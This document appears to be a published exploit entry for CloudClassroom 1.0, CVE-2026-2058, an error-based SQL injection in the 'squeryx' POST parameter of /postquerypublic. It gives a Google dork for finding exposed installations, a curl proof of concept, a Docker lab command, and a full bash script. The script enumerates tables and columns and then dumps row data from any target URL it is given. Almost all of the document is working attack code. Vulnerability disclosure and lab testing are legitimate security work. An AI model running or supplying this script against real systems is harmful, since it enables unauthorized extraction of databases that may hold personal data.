# Exploit Title: CloudClassroom 1.0 - SQL Injection (Post Query) # Google Dork: inurl:"postquerypublic" "Cloud Classroom" # Date: 2026-03-11 # Exploit Author: Carlos Tuma # Vendor Homepage: https://github.com/mathurvishal # Software Link: https://github.com/mathurvishal/CloudClassroom-PHP-Project # Version: 1.0 # Tested on: Ubuntu 20.04 / Apache / MySQL # CVE: CVE-2026-2058 # Description: # CloudClassroom PHP Project version 1.0 is vulnerable to an error-based SQL injection # via the "squeryx" POST parameter in the /postquerypublic endpoint. # Vulnerable Endpoint: # POST /postquerypublic # Docker Lab (for testing): # docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0 # Access: # http://localhost:9292/postquerypublic # PoC: # curl -X POST http://TARGET/postquerypublic \ # -H "Content-Type: application/x-www-form-urlencoded" \ # --data-urlencode "gnamex=test" \ # --data-urlencode "email=test@test.com" \ # --data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \ # --data-urlencode "update=Post Query!" #!/bin/bash TARGET="$1" if [ -z "$TARGET" ]; then echo "Usage: $0 http://target/postquerypublic" exit fi echo "=======================================" echo " CloudClassroom SQL Injection Exploit" echo " CVE-2026-2058" echo "=======================================" extract(){ payload="$1" curl -s -X POST "$TARGET" \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "gnamex=a" \ --data-urlencode "email=test@test.com" \ --data-urlencode "squeryx=$payload" \ --data-urlencode "update=Post Query!" \ | grep -oP "(?<=XPATH syntax error: '~).*?(?=~)" } echo echo "[+] Extracting database..." DB=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1") echo "[+] Database: $DB" echo echo "[+] Enumerating tables..." tables=() for i in {0..30} do TABLE=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT $i,1),0x7e),1) AND '1'='1") if [ -z "$TABLE" ]; then break fi echo " -> $TABLE" tables+=("$TABLE") done echo echo "=======================================" echo " Dumping database" echo "=======================================" for table in "${tables[@]}" do echo echo "[+] Table: $table" columns=() for i in {0..30} do COLUMN=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='$table' LIMIT $i,1),0x7e),1) AND '1'='1") if [ -z "$COLUMN" ]; then break fi echo " Column -> $COLUMN" columns+=("$COLUMN") done echo echo " Dumping data..." for column in "${columns[@]}" do for row in {0..20} do DATA=$(extract "a' AND updatexml(1,concat(0x7e,(SELECT $column FROM $table LIMIT $row,1),0x7e),1) AND '1'='1") if [ -z "$DATA" ]; then break fi echo " [$column][$row] = $DATA" done done done echo echo "[+] Dump finished"